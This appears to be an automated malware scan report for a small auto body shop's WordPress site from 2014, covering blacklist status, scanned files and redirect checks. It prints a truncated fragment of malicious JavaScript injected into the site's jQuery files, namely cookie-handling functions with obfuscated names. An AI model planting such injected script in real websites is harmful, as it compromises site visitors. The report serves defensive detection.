Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buchansautobody.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://buchansautobody.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://buchansautobody.com/ | 200 OK Content-Length: 12281 Content-Type: text/html | clean |
http://buchansautobody.com/wp/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93973 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( jQuery.noConflict(); Antivirus reports:
| ||
http://buchansautobody.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8088 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( Antivirus reports:
| ||
http://buchansautobody.com/wp/wp-content/themes/twentyeleven/js/showcase.js?ver=2011-04-28 | 200 OK Content-Length: 1361 Content-Type: application/javascript | clean |
http://buchansautobody.com/wp/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 10874 Content-Type: application/javascript | clean |
http://buchansautobody.com/wp/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 27478 Content-Type: application/javascript | clean |
http://buchansautobody.com/wp/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 888 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://buchansautobody.com/reception/ | 200 OK Content-Length: 12120 Content-Type: text/html | clean |
http://buchansautobody.com/location/ | 200 OK Content-Length: 12041 Content-Type: text/html | clean |
http://buchansautobody.com/services/ | 200 OK Content-Length: 11506 Content-Type: text/html | clean |
http://buchansautobody.com/auto-body-collision/ | 200 OK Content-Length: 13066 Content-Type: text/html | clean |
http://buchansautobody.com/paint-shop/ | 200 OK Content-Length: 12348 Content-Type: text/html | clean |
http://buchansautobody.com/speedy-glass/ | 200 OK Content-Length: 142145 Content-Type: text/html | clean |
http://buchansautobody.com/corrosion-free/ | 200 OK Content-Length: 12969 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buchansautobody.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 16:24:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://buchansautobody.com/?p=6>; rel=shortlink
X-Pingback: http://buchansautobody.com/wp/xmlrpc.php
GET / HTTP/1.1
Host: buchansautobody.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 16:24:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://buchansautobody.com/?p=6>; rel=shortlink
X-Pingback: http://buchansautobody.com/wp/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: buchansautobody.com
Referer: http://www.google.com/search?q=buchansautobody.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: buchansautobody.com
Referer: http://www.google.com/search?q=buchansautobody.com
Result:
The result is similar to the first query. There are no suspicious redirects found.